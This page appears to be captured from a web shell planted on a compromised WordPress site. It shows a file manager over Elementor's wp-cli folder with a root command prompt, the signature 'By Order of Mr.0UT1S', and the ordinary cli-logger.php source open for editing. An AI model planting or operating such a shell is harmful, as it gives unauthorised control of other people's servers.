home
/
aioutajg
/
unblockedgames247.com
/
wp-content
/
plugins
/
elementor
/
modules
/
wp-cli
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
cli-logger.php
599 bytes
Rename
Delete
command.php
4.59 KB
Rename
Delete
library.php
6.81 KB
Rename
Delete
module.php
1.29 KB
Rename
Delete
update.php
2.54 KB
Rename
Delete
<?php namespace Elementor\Modules\WpCli; use Elementor\Core\Logger\Loggers\Db; use Elementor\Core\Logger\Items\Log_Item_Interface; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Cli_Logger extends Db { public function save_log( Log_Item_Interface $item ) { $message = $item->format( 'raw' ); switch ( $item->type ) { case self::LEVEL_WARNING: \WP_CLI::warning( $message ); break; case self::LEVEL_ERROR: \WP_CLI::error( $message, false ); break; default: \WP_CLI::log( $message ); break; } parent::save_log( $item ); } }
Save